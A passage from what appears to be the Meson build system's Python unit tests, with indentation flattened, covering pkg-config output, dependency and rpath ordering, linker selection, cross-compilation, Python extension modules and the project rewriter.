@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.src_root, 'test cases', 'native', '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, etc, so this test is skipped.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not (is_osx() or is_linux()):
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
if not is_osx():
# Rest of the workflow only works on macOS
return
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
@skipIfNoPkgconfig
def test_usage_pkgconfig_prefixes(self):
'''
Build and install two external libraries, to different prefixes,
then build and install a client program that finds them via pkgconfig,
and verify the installed client program runs.
'''
oldinstalldir = self.installdir
# Build and install both external libraries without DESTDIR
val1dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val1')
val1prefix = os.path.join(oldinstalldir, 'val1')
self.prefix = val1prefix
self.installdir = val1prefix
self.init(val1dir)
self.build()
self.install(use_destdir=False)
self.new_builddir()
env1 = {}
env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig')
val2dir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'val2')
val2prefix = os.path.join(oldinstalldir, 'val2')
self.prefix = val2prefix
self.installdir = val2prefix
self.init(val2dir, override_envvars=env1)
self.build()
self.install(use_destdir=False)
self.new_builddir()
# Build, install, and run the client program
env2 = {}
env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig')
testdir = os.path.join(self.unit_test_dir, '77 pkgconfig prefixes', 'client')
testprefix = os.path.join(oldinstalldir, 'client')
self.prefix = testprefix
self.installdir = testprefix
self.init(testdir, override_envvars=env2)
self.build()
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'client')
env3 = {}
if is_cygwin():
env3['PATH'] = os.path.join(val1prefix, 'bin') + \
os.pathsep + \
os.path.join(val2prefix, 'bin') + \
os.pathsep + os.environ['PATH']
out = self._run([prog], override_envvars=env3).strip()
# Expected output is val1 + val2 = 3
self.assertEqual(out, '3')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
linker = cc.linker
if not linker.export_dynamic_args(env):
raise unittest.SkipTest('Not applicable for linkers without --export-dynamic')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '74 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def test_no_rpath_for_static(self):
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
self.build()
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertIsNone(build_rpath)
def test_lookup_system_after_broken_fallback(self):
# Just to generate libfoo.pc so we can test system dependency lookup.
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir = self.privatedir
# Write test project where the first dependency() returns not-found
# because 'broken' subproject does not exit, but that should not prevent
# the 2nd dependency() to lookup on system.
self.new_builddir()
with tempfile.TemporaryDirectory() as d:
with open(os.path.join(d, 'meson.build'), 'w') as f:
f.write(textwrap.dedent('''\
project('test')
dependency('notfound', fallback: 'broken', required: false)
dependency('libfoo', fallback: 'broken', required: true)
'''))
self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir})
def test_as_link_whole(self):
testdir = os.path.join(self.unit_test_dir, '79 as link whole')
self.init(testdir)
with open(os.path.join(self.privatedir, 'bar1.pc')) as f:
content = f.read()
self.assertIn('-lfoo', content)
with open(os.path.join(self.privatedir, 'bar2.pc')) as f:
content = f.read()
self.assertNotIn('-lfoo', content)
class BaseLinuxCrossTests(BasePlatformTests):
# Don't pass --libdir when cross-compiling. We have tests that
# check whether meson auto-detects it correctly.
libdir = None
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_cross_libdir_subproject(self):
# Guard against a regression where calling "subproject"
# would reset the value of libdir to its default value.
testdir = os.path.join(self.unit_test_dir, '78 subdir libdir')
self.init(testdir, extra_args=['--libdir=fuf'])
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'fuf')
return
self.assertTrue(False, 'Libdir specified on command line gets reset.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BaseLinuxCrossTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
